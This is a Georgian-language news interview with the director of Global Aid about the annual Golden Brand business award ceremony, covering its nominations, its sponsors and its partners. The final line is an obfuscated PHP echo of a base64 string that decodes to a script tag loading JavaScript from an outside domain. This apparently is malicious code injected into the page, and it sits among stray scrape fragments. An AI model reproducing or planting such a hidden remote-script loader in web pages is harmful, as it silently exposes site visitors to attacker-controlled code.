celsiusi
ავერსი საქკაბელი

“ოქროს ბრენდის” ცერემონიალი, რომელიც საქართველოში  2005 წლიდან ყოველ წელიწადს ტარდება, წელს 24 ივნისს გაიმართება.  დაჯილდოვების შესახებ და ცერემონიის დეტალებზე უფრო მეტი ინფორმაციიის გასარკვევად საინფორმაციო სააგენტო „ბიზნესთაიმი“  კომპანია “გლობალ აიდის” დირექტორს ნათია ჯინჭარაძეს ესაუბრა. 

ქალბატონო ნათია, პირველ რიგში მინდა გკითხოთ, როგორია წლევანდელი დაჯილდოვების მიმართ ბიზნესის ჩართულობა? 
 
როგორც ყოველთვის, ინტერესი ძალიან დიდია. წლევანდელ დაჯილდოების ცერემონიალზე, წინა წლებთან შედარებით კიდევ  უფრო მეტი ბრენდი იქნება წარმოდგენლი.  
 
წინა წლებს რომ შეადაროთ, რითი იქნება განსხვავებული წლევანდელი “გოლდენ ბრენდის” დაჯილდოვება? 
 
წინა წლებთან შედარებით იქნება ბევრი ახალი ნომინაცია, ბევრი საერთაშორისო ბრენდის  წარმომადგენელი გვესტუმრება უცხოეთიდან და რა თქმა უნდა, ისევე როგორც ყოველწლიურად, წელსაც, ახალ მუსიკალურ შოუ პროგრამას შევთავაზებთ დამსწრე საზოგადოებას. 
 
როგორ ფიქრობთ, რამდენად აცნობიერებს ბიზნესი მსგავსი ღონისძიებების მნიშვნელობას? 
 
ზოგადად, კომპანიებისთვის მნიშვნელოვანია მათი შრომის და შედეგების დაფასება და აღიარება რადგან, ეს კიდევ უფრო მეტ სტიმულს აძლევს მათ სამომავლოდ ბიზნეს-პროექტების განხორციელებაში.  ყოველი წარმატებული კომპანია,  არა მხოლოდ ღირებულ პროდუქტს, არამედ თავად ღირებულებას ქმნის, რომლისთვისაც მიზნის მისაღწევად მნიშვნელოვანია ისეთი ინვესტიციის ჩადება როგორიც  არის დისციპლინა, შრომისმოყვარეობა და ინტელექტუალური უნარი: - ყოველი სამუშაო დღე აქციოს შესაძლებლობად, დაინახოს ცოტა უფრო შორს, ვიდრე სხვები ხედავენ და შეამჩნიოს ირგვლივ ის, რასაც სხვები ვერ ამჩნევენ. ეს არის მნიშვნელოვანი წარმატების გასაღები. სიტყვა წარმატებაში ბევრი რამ იგულისხმება. ვისაც შეუძლია დასკვნების გამოტანა, კონკრეტული გადაწყვეტილებების მიღება და, რა თქმა უნდა, დროულად მოქმედება! მოთმინება, უნარი, მიაწოდო ადამიანებს ის, რასაც მხოლოდ შენ ხედავ და გესმის. ჯანსაღი პრაგმატიზმი და მონდომება, გამბედაობა და კრეატიულობა - ყველა ეს თვისება არანაკლებ მნიშვნელოვანია აკეთო შენი საქმე ძალიან ხშირად, სწორედ ეს არის ძალიან წარმატებული სხვებისგან განსხვავებით განსაკუთრებული ბიზნესი. ამ უნარ ჩვევების დამსახურებაა თითოეული ბრენდის გამარჯვება. 
 20230605 124331
წელს სულ რამდენი ნომინაცია იქნება წარმოდგენილი?
 
წელს, 24 ივნისს მედიის თანდასწრებით, 61 გამარჯვებული ბრენდი              დასახელდება.  
 
როგორ ფიქრობთ რას ნიშნავს “გოლდენ ბრენდის” დაჯილდოვების ღონისძიებაში ჩართულობა ბიზნესისთვის და როგორია ბიზნესის დამოკიდებულება? 
 
ბიზნესს სრულად აქვს გათავისებული ამ დაჯილდოების მნიშვნელობა, რადგან ეს არ არის მხოლოდ საზეიმო საღამო. არამედ შესძლებლობა წარადგინო შენი ბრენდი ბაზარზე როგორც საუკეთესო. უამრავი კომპანია, როგორც ქართული, ასევე საერაშორისო, იყენებს ოქროს ბრენდის სავაჭრო ნიშანს - თავიანთი პროდუქციის პოპულარიზაციისთვის, როგორც სატელევიზიო რეკლამის თვალსაზრისით, სავაჭრო დახლებზეც ხშირად ნახავთ სხვადასხვა პროდუქციაზე დატანებულ ოქროს ბრენდის ეტიკეტებს. ეს ნიშნავს რომ მაგალითები ყოველთვის სიტყვებზე უკეთ მეტყველებენ. წლიდან წლამდე მრავალი ბრენდი ელოდება  გამარჯვებას. ჩვენთვის თითოეული გამარჯვებული ბრენდი  უნიკალურია.  ჩვენ არ გვავიწყდება, რომ, პირველ რიგში, მათი წარმატება  პროფესიული მიღწევებით იზომება. წლების მანძილზე ყველა გამარჯვებული ბრენდის ისტორიები ადასტურებს, რომ სურვილის შემთხვევაში, ნებისმიერს შეუძლია გახდეს წარმატებული ბიზნესის ყველა მნიშვნელოვან სფეროში.
 
ვინ არიან ღონისძიების მხარდამჭერები?
 
ოქროს ბრენდის ცერემონიალი 2005 წლიდან ტარდება. დღიდან დაარსებისა პროექტი მხარდაჭერილია ეკონომიკის სამინისტროს, თბილისის მერიის, საქართველოს სავაჭრო სამრეწველო პალატის, საერთაშორისო სავაჭრო პალატის, მეწარმე ქალთა საბჭო საქართველოში, შვეიცარია საქართველოს ბიზნეს საბჭოს  მიერ.   ოქროს ბრენდის პარტნიორებია: საერთაშორისო გამოცემები American Stock News (https://americanstocknews.com) The Washington Inquirer (https://thewashingtoninquirer.com),  The Dallas Observer (https://thedallasobserver.com),  ოქროს ბრენდის რადიო პარტნიორებია: რადიო კომერსანტი FM 95,5 , რადიო მაესტრო FM  94, 7  რადიო ვინილი FM 99, 7 რადიო  M7 - FM  -93.1  ოქროს ბრენდის საინფორმაციო მხარდამჭერია: საინფორმაციო სააგენტო Business Time,  ჟურნალი გლოსი, და publika.ge
 
რა სურპიზს სთავაზობთ წლევანდელ მონაწილეებს?
 
ტრადიციულად, დაჯილდოების ცერემონია, არ არის მხოლოდ მისი ოფიციალური ნაწილი. იქნება ბევრი მუსიკალური ნომერი და პრიზების გათამაშება.  
ავტორი
მირანდა შურღაია
1520
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");